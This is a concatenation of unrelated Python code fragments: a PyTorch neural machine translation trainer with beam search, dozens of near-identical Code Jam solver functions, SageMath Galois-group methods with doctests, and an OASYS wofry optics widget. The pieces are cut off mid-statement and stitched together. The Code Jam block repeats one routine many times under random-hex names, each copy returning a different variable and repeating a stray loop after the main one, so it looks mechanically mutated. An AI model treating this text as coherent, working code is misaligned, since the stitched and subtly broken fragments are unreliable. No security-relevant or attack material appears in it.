sorted_dest_sequences = sorted_dest_sequences[1:, :]
# Remove paddings
logits_copy = logits.clone()
logits = nn.utils.rnn.pack_padded_sequence(logits, sorted_decode_lengths).data
sorted_dest_sequences = nn.utils.rnn.pack_padded_sequence(sorted_dest_sequences,
sorted_decode_lengths).data
# Calculate loss
loss = self.criterion(logits, sorted_dest_sequences)
# Track metrics
loss_tracker.update(loss.item(), sum(sorted_decode_lengths))
acc_tracker.update(accuracy(logits, sorted_dest_sequences, top_k=5), sum(sorted_decode_lengths))
# Update references
target_sequences = data.dest[0].t()[sorted_indices]
for j in range(target_sequences.size(0)):
target_sequence = target_sequences[j].tolist()
reference = [self.dest_field.vocab.itos[indice] for indice in target_sequence if indice not in (
self.dest_field.vocab.stoi[self.dest_field.init_token],
self.dest_field.vocab.stoi[self.dest_field.pad_token]
)]
references.append([reference])
# Update hypotheses
_, predictions = torch.max(logits_copy, dim=2)
predictions = predictions.t().tolist()
for j, p in enumerate(predictions):
hypotheses.append([self.dest_field.vocab.itos[indice]
for indice in predictions[j][:sorted_decode_lengths[j]] # Remove padding
if indice not in (
self.dest_field.vocab.stoi[self.dest_field.init_token],
self.dest_field.vocab.stoi[self.dest_field.pad_token]
)])
assert len(references) == len(hypotheses)
# Update progressbar description
progress_bar.set_description(
f'Epoch: {epoch + 1:03d} - val_loss: {loss_tracker.average:.3f}'
f' - val_acc: {acc_tracker.average:.3f}%')
# Calculate BLEU-4 score
bleu4 = bleu_score(hypotheses, references, max_n=4, weights=[0.25, 0.25, 0.25, 0.25])
# Display some examples
for i in np.random.choice(len(self.valid_iterator), size=3, replace=False):
src, dest = ' '.join(references[i][0]), ' '.join(hypotheses[i])
self.logger.info(f'Ground truth translation: {src}')
self.logger.info(f'Predicted translation: {dest}')
self.logger.info('=' * 100)
return loss_tracker.average, acc_tracker.average, bleu4
def train(self, n_epochs: int, grad_clip: float, tf_ratio: float):
"""
Train the model.
Args:
n_epochs: int
grad_clip: float
tf_ratio: float
Returns:
history: Dict[str, List[float]]
"""
last_improvement = self.load_model_optimizer_weights()
history, best_bleu = {'acc': [], 'loss': [], 'val_acc': [], 'val_loss': [], 'bleu4': []}, 0.
for epoch in range(n_epochs):
if last_improvement == 4: # Stop training if no improvement since last 4 epochs
self.logger.info('Training Finished - The model has stopped improving since last 4 epochs')
break
if last_improvement > 0: # Decay LR if no improvement
adjust_lr(optimizer=self.optimizer, shrink_factor=0.9, verbose=True, logger=self.logger)
loss, acc = self.train_step(epoch=epoch, grad_clip=grad_clip, tf_ratio=tf_ratio) # Train step
val_loss, val_acc, bleu4 = self.validate(epoch=epoch) # Validation step
# Update history dict
history['acc'].append(acc)
history['loss'].append(loss)
history['val_acc'].append(val_acc)
history['val_loss'].append(val_loss)
history['bleu4'].append(bleu4)
# Print BLEU score
text = f'BLEU-4: {bleu4 * 100:.3f}%'
if bleu4 > best_bleu:
best_bleu, last_improvement = bleu4, 0
else:
last_improvement += 1
text += f' - Last improvement since {last_improvement} epoch(s)'
self.logger.info(text)
# Decrease teacher forcing rate
tf_ratio = adjust_tf(tf_ratio=tf_ratio, shrink_factor=0.8, verbose=False)
# Checkpoint
save(model=self.model, optimizer=self.optimizer, last_improvement=last_improvement, bleu4=bleu4,
is_best=bleu4 >= best_bleu)
return history
def evaluate(self, dataset_name: str, beam_size: int, max_len: int, device: torch.device):
"""
Evaluate the model on the test data
Args:
beam_size: int
dataset_name: str
The dataset on which we evaluate the model. Can be valid or test.
max_len: int
device: torch.device
Returns:
hypotheses: List[str]
references: List[str]
sources: List[str]
bleu4: float
pred_logps: List[float]
attention_weights: List[np.array]
"""
if dataset_name not in ['valid', 'test']:
raise ValueError
_ = self.load_model_optimizer_weights()
# TODO
# Use dataset instead of iterator
attention = self.model.__class__.__name__.__contains__('Attention')
references, hypotheses, sources, pred_logps, attention_weights = [], [], [], [], []
self.model.eval()
with torch.no_grad():
iterator = getattr(self, f'{dataset_name}_iterator')
progress_bar = tqdm.tqdm(enumerate(iterator), total=len(iterator))
for i, data in progress_bar:
src_sequences, src_lengths = data.src[0], data.src[1]
dest_sequences, dest_lengths = data.dest[0], data.dest[1]
batch_size = src_sequences.shape[1]
for j in range(batch_size): # We evaluate sentence by sentence
src_sequence = src_sequences[:, j].unsqueeze(1) # [seq_len, 1]
dest_sequence = dest_sequences[:, j].unsqueeze(1) # [seq_len, 1]
src_length, dest_length = src_lengths[j, None], dest_lengths[j, None] # [1,]
# Encoding
enc_outputs, (h_state, c_state) = self.model.encoder(input_sequences=src_sequence,
sequence_lengths=src_length)
# Decoding
if attention:
mask = self.model.create_mask(src_sequence) # [seq_len, 1]
tree = [[Node(
token=torch.LongTensor([self.dest_field.vocab.stoi[self.dest_field.init_token]]).to(device),
states=(h_state, c_state, None)
)]]
for _ in range(max_len):
next_nodes = []
for node in tree[-1]:
if node.eos: # Skip eos token
continue
# Decode
if attention:
logit, (h_state, c_state, attention_weights) = self.model.decoder(
input_word_index=node.token,
h_state=node.states[0].contiguous(),
c_state=node.states[1].contiguous(),
enc_outputs=enc_outputs,
mask=mask
)
else:
logit, (h_state, c_state) = self.model.decoder(input_word_index=node.token,
h_state=node.states[0].contiguous(),
c_state=node.states[1].contiguous())
# logit: [1, vocab_size]
# h_state: [n_layers, 1, hidden_size]
# c_state: [n_layers, 1, hidden_size]
# Get scores
logp = F.log_softmax(logit, dim=1).squeeze(dim=0) # [vocab_size]
# Get top k tokens & logps
topk_logps, topk_tokens = torch.topk(logp, beam_size)
for k in range(beam_size):
next_nodes.append(Node(
token=topk_tokens[k, None], states=(
h_state, c_state, attention_weights if attention else None),
logp=topk_logps[k, None].cpu().item(), parent=node,
eos=topk_tokens[k].cpu().item() == self.dest_field.vocab[self.dest_field.eos_token]
))
if len(next_nodes) == 0:
break
# Sort next_nodes to get the best
next_nodes = sorted(next_nodes, key=lambda _node: _node.logps, reverse=True)
# Update the tree
tree.append(next_nodes[:beam_size])
# Find the best path of the tree
best_path = find_best_path(tree)
# Get the translation
pred_translated = [*map(lambda _node: self.dest_field.vocab.itos[_node.token], best_path)]
pred_translated = [*filter(lambda word: word not in [
self.dest_field.init_token, self.dest_field.eos_token
], pred_translated[::-1])]
# Update hypotheses
hypotheses.append(pred_translated)
# Update pred logps
pred_logps.append(sum([*map(lambda _node: _node.logps, best_path)]))
# Update attention weights
if attention:
attention_weights.append(
torch.cat([*map(lambda _node: _node.states[-1], best_path)], dim=1).cpu().detach().numpy()
)
# Update references
references.append([[
self.dest_field.vocab.itos[indice]
for indice in dest_sequence
if indice not in (
self.dest_field.vocab.stoi[self.dest_field.init_token],
self.dest_field.vocab.stoi[self.dest_field.eos_token],
self.dest_field.vocab.stoi[self.dest_field.pad_token]
)
]])
# Update sources
sources.append([
self.src_field.vocab.itos[indice]
for indice in src_sequence
if indice not in (
self.src_field.vocab.stoi[self.src_field.init_token],
self.src_field.vocab.stoi[self.src_field.eos_token],
self.src_field.vocab.stoi[self.src_field.pad_token]
)
])
# Calculate BLEU-4 score
bleu4 | |
r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return infile
def func_c4b455e670464f0abb57a45a200956ec():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return r
def func_424728ccf8bf444ebac61c68c76f4d3f():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return b
def func_b2fbcb34b7bc404195a6d2b707095403():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return A
def func_9c2399ce63344af09045aa205c8e5ec3():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return T
def func_0baf7a2224154215ad97b22e7a041b21():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return best
def func_d1a5f32b7cd240c0b383329cd5fc9faa():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return N
def func_7a1ced1d999d45729628f9914c8dc9a8():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return a
def func_5c85d4feecc64c9cbbafcefb97477778():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in | |
``self``.
INPUT:
- ``i`` -- integer between ``0`` and ``n-1`` where
``n`` is the cardinality of this set
EXAMPLES::
sage: G = NumberField(x^3 - 3*x + 1,'a').galois_group()
sage: [G.unrank(i) for i in range(G.cardinality())]
[(), (1,2,3), (1,3,2)]
TESTS::
sage: G = NumberField(x^3 - 3*x + 1,'a').galois_group()
sage: L = [G.unrank(i) for i in range(G.cardinality())]
sage: L == G.list()
True
"""
return self._elts[i]
def __iter__(self):
"""
Iterate over ``self``.
EXAMPLES::
sage: G = NumberField(x^3 - 3*x + 1,'a').galois_group()
sage: list(G) == G.list()
True
"""
return iter(self._elts)
def subgroup(self, elts):
r"""
Return the subgroup of self with the given elements. Mostly for internal use.
EXAMPLES::
sage: G = NumberField(x^3 - x - 1, 'a').galois_closure('b').galois_group()
sage: G.subgroup([ G(1), G([(1,2,3),(4,5,6)]), G([(1,3,2),(4,6,5)]) ])
Subgroup [(), (1,2,3)(4,5,6), (1,3,2)(4,6,5)] of Galois group of Number Field in b with defining polynomial x^6 - 6*x^4 + 9*x^2 + 23
"""
if len(elts) == self.order():
return self
else:
return GaloisGroup_subgroup(self, elts)
# Proper number theory starts here. All the functions below make no sense
# unless the field is Galois.
def decomposition_group(self, P):
r"""
Decomposition group of a prime ideal P, i.e. the subgroup of elements
that map P to itself. This is the same as the Galois group of the
extension of local fields obtained by completing at P.
This function will raise an error if P is not prime or the given number
field is not Galois.
P can also be an infinite prime, i.e. an embedding into `\RR` or `\CC`.
EXAMPLES::
sage: K.<a> = NumberField(x^4 - 2*x^2 + 2,'b').galois_closure()
sage: P = K.ideal([17, a^2])
sage: G = K.galois_group()
sage: G.decomposition_group(P)
Subgroup [(), (1,8)(2,7)(3,6)(4,5)] of Galois group of Number Field in a with defining polynomial x^8 - 20*x^6 + 104*x^4 - 40*x^2 + 1156
sage: G.decomposition_group(P^2)
Traceback (most recent call last):
...
ValueError: Fractional ideal (...) is not prime
sage: G.decomposition_group(17)
Traceback (most recent call last):
...
ValueError: Fractional ideal (17) is not prime
An example with an infinite place::
sage: L.<b> = NumberField(x^3 - 2,'a').galois_closure(); G=L.galois_group()
sage: x = L.places()[0]
sage: G.decomposition_group(x).order()
2
"""
if not self.is_galois():
raise TypeError("Decomposition groups only defined for Galois extensions")
if isinstance(P, NumberFieldHomomorphism_im_gens):
if self.number_field().is_totally_real():
return self.subgroup([self.identity()])
else:
return self.subgroup([self.identity(), self.complex_conjugation(P)])
else:
P = self.number_field().ideal_monoid()(P)
if not P.is_prime():
raise ValueError("%s is not prime" % P)
return self.subgroup([s for s in self if s(P) == P])
def complex_conjugation(self, P=None):
"""
Return the unique element of self corresponding to complex conjugation,
for a specified embedding P into the complex numbers. If P is not
specified, use the "standard" embedding, whenever that is well-defined.
EXAMPLES::
sage: L.<z> = CyclotomicField(7)
sage: G = L.galois_group()
sage: conj = G.complex_conjugation(); conj
(1,4)(2,5)(3,6)
sage: conj(z)
-z^5 - z^4 - z^3 - z^2 - z - 1
An example where the field is not CM, so complex conjugation really
depends on the choice of embedding::
sage: L = NumberField(x^6 + 40*x^3 + 1372,'a')
sage: G = L.galois_group()
sage: [G.complex_conjugation(x) for x in L.places()]
[(1,3)(2,6)(4,5), (1,5)(2,4)(3,6), (1,2)(3,4)(5,6)]
"""
if P is None:
Q = self.number_field().specified_complex_embedding()
if Q is None:
raise ValueError("No default complex embedding specified")
P = Q
P = refine_embedding(P, infinity)
if not self.number_field().is_galois():
raise TypeError("Extension is not Galois")
if self.number_field().is_totally_real():
raise TypeError("No complex conjugation (field is real)")
g = self.number_field().gen()
gconj = P(g).conjugate()
elts = [s for s in self if P(s(g)) == gconj]
if len(elts) != 1:
raise ArithmeticError("Something has gone very wrong here")
return elts[0]
def ramification_group(self, P, v):
"""
Return the vth ramification group of self for the prime P, i.e. the set
of elements s of self such that s acts trivially modulo P^(v+1). This
is only defined for Galois fields.
EXAMPLES::
sage: K.<b> = NumberField(x^3 - 3,'a').galois_closure()
sage: G=K.galois_group()
sage: P = K.primes_above(3)[0]
sage: G.ramification_group(P, 3)
Subgroup [(), (1,2,4)(3,5,6), (1,4,2)(3,6,5)] of Galois group of Number Field in b with defining polynomial x^6 + 243
sage: G.ramification_group(P, 5)
Subgroup [()] of Galois group of Number Field in b with defining polynomial x^6 + 243
"""
if not self.is_galois():
raise TypeError("Ramification groups only defined for Galois extensions")
P = self.number_field().ideal_monoid()(P)
if not P.is_prime():
raise ValueError("%s is not prime")
return self.subgroup([g for g in self if g(P) == P and g.ramification_degree(P) >= v + 1])
def inertia_group(self, P):
"""
Return the inertia group of the prime P, i.e. the group of elements acting
trivially modulo P. This is just the 0th ramification group of P.
EXAMPLES::
sage: K.<b> = NumberField(x^2 - 3,'a')
sage: G = K.galois_group()
sage: G.inertia_group(K.primes_above(2)[0])
Galois group of Number Field in b with defining polynomial x^2 - 3
sage: G.inertia_group(K.primes_above(5)[0])
Subgroup [()] of Galois group of Number Field in b with defining polynomial x^2 - 3
"""
if not self.is_galois():
raise TypeError("Inertia groups only defined for Galois extensions")
return self.ramification_group(P, 0)
def ramification_breaks(self, P):
r"""
Return the set of ramification breaks of the prime ideal P, i.e. the
set of indices i such that the ramification group `G_{i+1} \ne G_{i}`.
This is only defined for Galois fields.
EXAMPLES::
sage: K.<b> = NumberField(x^8 - 20*x^6 + 104*x^4 - 40*x^2 + 1156)
sage: G = K.galois_group()
sage: P = K.primes_above(2)[0]
sage: G.ramification_breaks(P)
{1, 3, 5}
sage: min( [ G.ramification_group(P, i).order() / G.ramification_group(P, i+1).order() for i in G.ramification_breaks(P)] )
2
"""
if not self.is_galois():
raise TypeError("Ramification breaks only defined for Galois extensions")
from sage.rings.infinity import infinity
from sage.sets.set import Set
i = [g.ramification_degree(P) - 1 for g in self.decomposition_group(P)]
i.remove(infinity)
return Set(i)
def artin_symbol(self, P):
r"""
Return the Artin symbol `\left(\frac{K /
\QQ}{\mathfrak{P}}\right)`, where K is the number field of self,
and `\mathfrak{P}` is an unramified prime ideal. This is the unique
element s of the decomposition group of `\mathfrak{P}` such that `s(x) = x^p \bmod
\mathfrak{P}`, where p is the residue characteristic of `\mathfrak{P}`.
EXAMPLES::
sage: K.<b> = NumberField(x^4 - 2*x^2 + 2, 'a').galois_closure()
sage: G = K.galois_group()
sage: [G.artin_symbol(P) for P in K.primes_above(7)]
[(1,5)(2,6)(3,7)(4,8), (1,5)(2,6)(3,7)(4,8), (1,4)(2,3)(5,8)(6,7), (1,4)(2,3)(5,8)(6,7)]
sage: G.artin_symbol(17)
Traceback (most recent call last):
...
ValueError: Fractional ideal (17) is not prime
sage: QuadraticField(-7,'c').galois_group().artin_symbol(13)
(1,2)
sage: G.artin_symbol(K.primes_above(2)[0])
Traceback (most recent call last):
...
ValueError: Fractional ideal (...) is ramified
"""
if not self.is_galois():
raise TypeError("Artin symbols only defined for Galois extensions")
P = self.number_field().ideal_monoid()(P)
if not P.is_prime():
raise ValueError("%s is not prime" % P)
p = P.smallest_integer()
t = []
gens = self.number_field().ring_of_integers().ring_generators()
for s in self.decomposition_group(P):
w = [(s(g) - g**p).valuation(P) for g in gens]
if min(w) >= 1:
t.append(s)
if len(t) > 1:
raise ValueError("%s is ramified" % P)
return t[0]
class GaloisGroup_subgroup(GaloisGroup_v2):
r"""
A subgroup of a Galois group, as returned by functions such as ``decomposition_group``.
"""
def __init__(self, ambient, elts):
r"""
Create a subgroup of a Galois group with the given elements. It is generally better to
use the subgroup() method of the parent group.
EXAMPLES::
sage: from sage.rings.number_field.galois_group import GaloisGroup_subgroup
sage: G = NumberField(x^3 - x - 1, 'a').galois_closure('b').galois_group()
sage: GaloisGroup_subgroup( G, [ G(1), G([(1,2,3),(4,5,6)]), G([(1,3,2),(4,6,5)])])
Subgroup [(), (1,2,3)(4,5,6), (1,3,2)(4,6,5)] of Galois group of Number Field in b with defining polynomial x^6 - 6*x^4 + 9*x^2 + 23
TESTS:
Check that :trac:`17664` is fixed::
sage: L.<c> = QuadraticField(-1)
sage: P = L.primes_above(5)[0]
sage: G = L.galois_group()
sage: H = G.decomposition_group(P)
sage: H.domain()
{1, 2}
sage: G.artin_symbol(P)
()
"""
# XXX This should be fixed so that this can use GaloisGroup_v2.__init__
PermutationGroup_generic.__init__(self, elts, canonicalize=True,
domain=ambient.domain())
self._ambient = ambient
self._number_field = ambient.number_field()
self._galois_closure = ambient._galois_closure
self._pari_data = ambient._pari_data
self._pari_gc = ambient._pari_gc
self._gc_map = ambient._gc_map
self._elts = elts
def fixed_field(self):
r"""
Return the fixed field of this subgroup (as a subfield of the Galois
closure of the number field associated to the ambient Galois group).
EXAMPLES::
sage: L.<a> = NumberField(x^4 + 1)
sage: G = L.galois_group()
sage: H = G.decomposition_group(L.primes_above(3)[0])
sage: H.fixed_field()
(Number Field in a0 with defining polynomial x^2 + 2, Ring morphism:
From: Number Field in a0 with defining polynomial x^2 + 2
| |
import numpy, sys
from PyQt5.QtGui import QPalette, QColor, QFont
from PyQt5.QtWidgets import QMessageBox
from orangewidget import gui
from orangewidget import widget
from orangewidget.settings import Setting
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from oasys.widgets.gui import ConfirmDialog
from oasys.util.oasys_util import EmittingStream, TriggerIn
from syned.widget.widget_decorator import WidgetDecorator
from syned.beamline.element_coordinates import ElementCoordinates
from syned.beamline.beamline_element import BeamlineElement
from syned.beamline.shape import *
from wofry.propagator.propagator import PropagationManager, PropagationElements, PropagationParameters
from wofryimpl.propagator.propagators1D.fresnel import Fresnel1D
from wofryimpl.propagator.propagators1D.fresnel_convolution import FresnelConvolution1D
from wofryimpl.propagator.propagators1D.fraunhofer import Fraunhofer1D
from wofryimpl.propagator.propagators1D.integral import Integral1D
from wofryimpl.propagator.propagators1D.fresnel_zoom import FresnelZoom1D
from wofryimpl.propagator.propagators1D.fresnel_zoom_scaling_theorem import FresnelZoomScaling1D
from orangecontrib.wofry.util.wofry_objects import WofryData
from orangecontrib.wofry.widgets.gui.ow_wofry_widget import WofryWidget
def initialize_default_propagator_1D():
propagator = PropagationManager.Instance()
propagator.add_propagator(Fraunhofer1D())
propagator.add_propagator(Fresnel1D())
propagator.add_propagator(FresnelConvolution1D())
propagator.add_propagator(Integral1D())
propagator.add_propagator(FresnelZoom1D())
propagator.add_propagator(FresnelZoomScaling1D())
try:
initialize_default_propagator_1D()
except:
pass
class OWWOOpticalElement1D(WofryWidget, WidgetDecorator):
maintainer = "<NAME>"
maintainer_email = "<EMAIL>(<EMAIL>"
keywords = ["data", "file", "load", "read"]
category = "Wofry Optical Elements"
outputs = [{"name":"WofryData",
"type":WofryData,
"doc":"WofryData",
"id":"WofryData"},
{"name":"Trigger",
"type": TriggerIn,
"doc":"Feedback signal to start a new beam simulation",
"id":"Trigger"},
]
inputs = [("WofryData", WofryData, "set_input"),
WidgetDecorator.syned_input_data()[0]]
oe_name = Setting("")
p = Setting(0.0)
q = Setting(0.0)
angle_radial = Setting(0.0)
angle_azimuthal = Setting(0.0)
shape = Setting(0)
surface_shape = Setting(0)
input_data = None
wavefront_to_plot = None
propagators_list = ["Fresnel", "Fresnel (Convolution)", "Fraunhofer", "Integral", "Fresnel Zoom","Fresnel Zoom Scaled"]
# plot_titles = ["Wavefront 1D Intensity", "Wavefront 1D Phase","Wavefront Real(Amplitude)","Wavefront Imag(Amplitude)"]
propagator = Setting(4)
magnification_x = Setting(1.0) # For Fresnel Zoom & Integral
magnification_N = Setting(1.0) # For Integral
scaled_guess_R = Setting(True) # For Fresnel Zoom Scaled
scaled_R = Setting(1000.0) # For Fresnel Zoom Scaled
scaled_Rmax = Setting(100.0) # For Fresnel Zoom Scaled
scaled_N = Setting(100) # For Fresnel Zoom Scaled
wavefront_radius = 1.0
def __init__(self,is_automatic=True, show_view_options=True, show_script_tab=True):
super().__init__(is_automatic=is_automatic, show_view_options=show_view_options, show_script_tab=show_script_tab)
self.runaction = widget.OWAction("Propagate Wavefront", self)
self.runaction.triggered.connect(self.propagate_wavefront)
self.addAction(self.runaction)
button_box = oasysgui.widgetBox(self.controlArea, "", addSpace=False, orientation="horizontal")
button = gui.button(button_box, self, "Propagate Wavefront", callback=self.propagate_wavefront)
font = QFont(button.font())
font.setBold(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Blue'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
button = gui.button(button_box, self, "Reset Fields", callback=self.callResetSettings)
font = QFont(button.font())
font.setItalic(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Red'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
button.setFixedWidth(150)
gui.separator(self.controlArea)
self.tabs_setting = oasysgui.tabWidget(self.controlArea)
self.tabs_setting.setFixedHeight(self.TABS_AREA_HEIGHT)
self.tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5)
self.tab_bas = oasysgui.createTabPage(self.tabs_setting, "O.E. Setting")
oasysgui.lineEdit(self.tab_bas, self, "oe_name", "O.E. Name", labelWidth=260, valueType=str, orientation="horizontal")
self.coordinates_box = oasysgui.widgetBox(self.tab_bas, "Coordinates", addSpace=True, orientation="vertical")
tmp = oasysgui.lineEdit(self.coordinates_box, self, "p", "Distance from previous Continuation Plane [m]", labelWidth=280, valueType=float, orientation="horizontal")
tmp.setToolTip("p")
tmp = oasysgui.lineEdit(self.coordinates_box, self, "q", "Distance to next Continuation Plane [m]", labelWidth=280, valueType=float, orientation="horizontal")
tmp.setToolTip("q")
# Commented srio (not yet implemented) TODO: implement it!
# oasysgui.lineEdit(self.coordinates_box, self, "angle_radial", "Incident Angle (to normal) [deg]", labelWidth=280, valueType=float, orientation="horizontal")
# oasysgui.lineEdit(self.coordinates_box, self, "angle_azimuthal", "Rotation along Beam Axis [deg]", labelWidth=280, valueType=float, orientation="horizontal")
self.draw_specific_box()
self.create_propagation_setting_tab()
def create_propagation_setting_tab(self):
self.tab_pro = oasysgui.createTabPage(self.tabs_setting, "Propagation Setting")
gui.comboBox(self.tab_pro, self, "propagator", label="Propagator", labelWidth=260,
items=self.propagators_list,
callback=self.set_Propagator,
sendSelectedValue=False, orientation="horizontal")
# Fresnel
self.fresnel_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
# Fraunhoffer
self.fraunhofer_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
# Integral
self.integral_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
tmp = oasysgui.lineEdit(self.integral_box, self, "magnification_x", "Magnification Factor for interval",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_x")
tmp = oasysgui.lineEdit(self.integral_box, self, "magnification_N", "Magnification Factor for N points",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_N")
# Fresnel zoom
self.zoom_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
tmp = oasysgui.lineEdit(self.zoom_box, self, "magnification_x", "Magnification Factor for interval",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_x")
# Fresnel Sacled zoom
self.zoom_scaled_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical")
tmp = oasysgui.lineEdit(self.zoom_scaled_box, self, "magnification_x", "Magnification Factor for interval",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_x")
gui.comboBox(self.zoom_scaled_box, self, "scaled_guess_R", label="Guess wavefront curvature", labelWidth=260,
items=["No","Yes"],
callback=self.set_ScaledGuess,
sendSelectedValue=False, orientation="horizontal")
self.zoom_scaled_box_1 = oasysgui.widgetBox(self.zoom_scaled_box, "", addSpace=False, orientation="vertical", height=90)
self.zoom_scaled_box_2 = oasysgui.widgetBox(self.zoom_scaled_box, "", addSpace=False, orientation="vertical", height=90)
oasysgui.lineEdit(self.zoom_scaled_box_1, self, "scaled_R", "Wavefront radius of curvature",
labelWidth=260, valueType=float, orientation="horizontal")
oasysgui.lineEdit(self.zoom_scaled_box_2, self, "scaled_Rmax", "Maximum wavefront radius of curvature",
